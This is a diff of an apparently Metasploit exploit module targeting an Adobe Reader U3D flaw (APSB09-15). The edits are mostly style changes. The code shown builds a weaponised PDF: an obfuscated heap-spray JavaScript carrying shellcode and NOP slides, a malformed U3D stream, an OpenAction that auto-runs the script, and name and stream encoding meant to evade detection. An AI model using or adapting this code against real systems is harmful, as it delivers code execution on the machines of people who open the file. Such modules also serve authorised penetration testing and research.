@@ -34,14 +34,13 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb09-15.html' ]
         ],
         'DefaultOptions' => {
-          'EXITFUNC' => 'process',
+          'EXITFUNC' => 'process'
         },
         'Payload' => {
           'Space' => 1024,
           'BadChars' => "\x00",
           'DisableNops'	=> true
         },
-        'Platform' => %w{win linux},
         'Targets' => [
           # test results (on Windows XP SP3)
           # reader 7.0.5 - untested
@@ -151,12 +150,12 @@ class MetasploitModule < Msf::Exploit::Remote
     # Obfuscate it up a bit
     script = obfuscate_js(script,
                           'Symbols' => {
-                            'Variables' => %W{pointersA_slide pointersA escA pointersB_slide pointersB escB pointersC_slide pointersC escC escShellcode nop_slide shellcode stringy size rest nopz loop1 xarr memoryz},
-                            'Methods' => %W{mkSlice spray}
+                            'Variables' => %w[pointersA_slide pointersA escA pointersB_slide pointersB escB pointersC_slide pointersC escC escShellcode nop_slide shellcode stringy size rest nopz loop1 xarr memoryz],
+                            'Methods' => %w[mkSlice spray]
                           }).to_s
 
     # create the u3d stuff
-    u3d = make_u3d_stream(target['Index'], "E" * 11)
+    u3d = make_u3d_stream(target['Index'], 'E' * 11)
 
     # Create the pdf
     pdf = make_pdf(script, u3d)
@@ -173,9 +172,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def random_non_ascii_string(count)
-    result = ""
+    result = ''
     count.times do
-      result << (rand(128) + 128).chr
+      result << (rand(128..255)).chr
     end
     result
   end
@@ -185,15 +184,15 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def io_ref(id)
-    "%d 0 R" % id
+    '%d 0 R' % id
   end
 
   # http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
   def n_obfu(str)
-    result = ""
+    result = ''
     str.scan(/./u) do |c|
       if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
-        result << "#%x" % c.unpack("C*")[0]
+        result << '#%x' % c.unpack('C*')[0]
       else
         result << c
       end
@@ -202,17 +201,17 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def ascii_hex_whitespace_encode(str)
-    result = ""
-    whitespace = ""
+    result = ''
+    whitespace = ''
     str.each_byte do |b|
-      result << whitespace << "%02x" % b
-      whitespace = " " * (rand(3) + 1)
+      result << whitespace << '%02x' % b
+      whitespace = ' ' * (rand(1..3))
     end
-    result << ">"
+    result << '>'
   end
 
   def u3d_pad(str, char = "\x00")
-    ret = ""
+    ret = ''
     if (str.length % 4) > 0
       ret << char * (4 - (str.length % 4))
     end
@@ -326,7 +325,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # build the U3D header (length will be patched in later)
     hdr_data = [1, 0].pack('n*') # version info
     hdr_data << [0, 0x24, 31337, 0, 0x6a].pack('VVVVV')
-    meta_str1 = "alalala0"
+    meta_str1 = 'alalala0'
     meta_str2 = "\xa8" * 1024
     hdr_meta = [1].pack('V')
     hdr_meta << [meta_str1.length].pack('v')
@@ -402,7 +401,7 @@ class MetasploitModule < Msf::Exploit::Remote
     cont_data << [index].pack('V') # split position index
     # unknown data
     cont_data << [1].pack('V') * 10
-    cont_data << "Feli" * 20
+    cont_data << 'Feli' * 20
     mesh_cont = [0xffffff3c, cont_data.length, 0].pack('VVV')
     mesh_cont << cont_data
     mesh_cont << u3d_pad(cont_data)
@@ -419,90 +418,90 @@ class MetasploitModule < Msf::Exploit::Remote
   def make_pdf(js, u3d_stream)
     xref = []
     eol = "\x0a"
-    obj_end = "" << eol << "endobj" << eol
+    obj_end = '' << eol << 'endobj' << eol
 
     # the header
-    pdf = "%PDF-1.7" << eol
+    pdf = '%PDF-1.7' << eol
 
     # filename/comment
-    pdf << "%" << random_non_ascii_string(4) << eol
+    pdf << '%' << random_non_ascii_string(4) << eol
 
     # js stream
     xref << pdf.length
     compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
-    pdf << io_def(1) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
-    pdf << "stream" << eol
+    pdf << io_def(1) << n_obfu('<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>' % compressed.length) << eol
+    pdf << 'stream' << eol
     pdf << compressed << eol
-    pdf << "endstream" << eol
+    pdf << 'endstream' << eol
     pdf << obj_end
 
     # catalog
     xref << pdf.length
-    pdf << io_def(3) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(4)
-    pdf << n_obfu("/Pages ") << io_ref(5)
-    pdf << n_obfu("/OpenAction ") << io_ref(8)
-    pdf << n_obfu(">>")
+    pdf << io_def(3) << n_obfu('<</Type/Catalog/Outlines ') << io_ref(4)
+    pdf << n_obfu('/Pages ') << io_ref(5)
+    pdf << n_obfu('/OpenAction ') << io_ref(8)
+    pdf << n_obfu('>>')
     pdf << obj_end
 
     # outline
     xref << pdf.length
-    pdf << io_def(4) << n_obfu("<</Type/Outlines/Count 0>>")
+    pdf << io_def(4) << n_obfu('<</Type/Outlines/Count 0>>')
     pdf << obj_end
 
     # kids
     xref << pdf.length
-    pdf << io_def(5) << n_obfu("<</Type/Pages/Count 2/Kids [")
-    pdf << io_ref(9) << " " # empty page
+    pdf << io_def(5) << n_obfu('<</Type/Pages/Count 2/Kids [')
+    pdf << io_ref(9) << ' ' # empty page
     pdf << io_ref(10) # u3d page
-    pdf << n_obfu("]>>")
+    pdf << n_obfu(']>>')
     pdf << obj_end
 
     # u3d stream
     xref << pdf.length
-    pdf << io_def(6) << n_obfu("<</Type/3D/Subtype/U3D/Length %s>>" % u3d_stream.length) << eol
-    pdf << "stream" << eol
+    pdf << io_def(6) << n_obfu('<</Type/3D/Subtype/U3D/Length %s>>' % u3d_stream.length) << eol
+    pdf << 'stream' << eol
     pdf << u3d_stream << eol
-    pdf << "endstream"
+    pdf << 'endstream'
     pdf << obj_end
 
     # u3d annotation object
     xref << pdf.length
-    pdf << io_def(7) << n_obfu("<</Type/Annot/Subtype")
-    pdf << "/3D/3DA <</A/PO/DIS/I>>"
-    pdf << n_obfu("/Rect [0 0 640 480]/3DD ") << io_ref(6) << n_obfu("/F 7>>")
+    pdf << io_def(7) << n_obfu('<</Type/Annot/Subtype')
+    pdf << '/3D/3DA <</A/PO/DIS/I>>'
+    pdf << n_obfu('/Rect [0 0 640 480]/3DD ') << io_ref(6) << n_obfu('/F 7>>')
     pdf << obj_end
 
     # js dict
     xref << pdf.length
-    pdf << io_def(8) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(1) + ">>" << obj_end
+    pdf << io_def(8) << n_obfu('<</Type/Action/S/JavaScript/JS ') + io_ref(1) + '>>' << obj_end
 
     # page 0 (empty)
     xref << pdf.length
-    pdf << io_def(9) << n_obfu("<</Type/Page/Parent ") << io_ref(5) << n_obfu("/MediaBox [0 0 640 480]")
-    pdf << n_obfu(" >>")
+    pdf << io_def(9) << n_obfu('<</Type/Page/Parent ') << io_ref(5) << n_obfu('/MediaBox [0 0 640 480]')
+    pdf << n_obfu(' >>')
     pdf << obj_end
 
     # page 1 (u3d)
     xref << pdf.length
-    pdf << io_def(10) << n_obfu("<</Type/Page/Parent ") << io_ref(5) << n_obfu("/MediaBox [0 0 640 480]")
-    pdf << n_obfu("/Annots [") << io_ref(7) << n_obfu("]")
-    pdf << n_obfu(">>")
+    pdf << io_def(10) << n_obfu('<</Type/Page/Parent ') << io_ref(5) << n_obfu('/MediaBox [0 0 640 480]')
+    pdf << n_obfu('/Annots [') << io_ref(7) << n_obfu(']')
+    pdf << n_obfu('>>')
     pdf << obj_end
 
     # xrefs
     xrefPosition = pdf.length
-    pdf << "xref" << eol
-    pdf << "0 %d" % (xref.length + 1) << eol
-    pdf << "0000000000 65535 f" << eol
+    pdf << 'xref' << eol
+    pdf << '0 %d' % (xref.length + 1) << eol
+    pdf << '0000000000 65535 f' << eol
     xref.each do |index|
-      pdf << "%010d 00000 n" % index << eol
+      pdf << '%010d 00000 n' % index << eol
     end
 
     # trailer
-    pdf << "trailer" << eol
-    pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(3) << ">>" << eol
-    pdf << "startxref" << eol
-    pdf << xrefPosition.to_s() << eol
-    pdf << "%%EOF" << eol
+    pdf << 'trailer' << eol
+    pdf << n_obfu('<</Size %d/Root ' % (xref.length + 1)) << io_ref(3) << '>>' << eol
+    pdf << 'startxref' << eol
+    pdf << xrefPosition.to_s << eol
+    pdf << '%%EOF' << eol
   end
 end
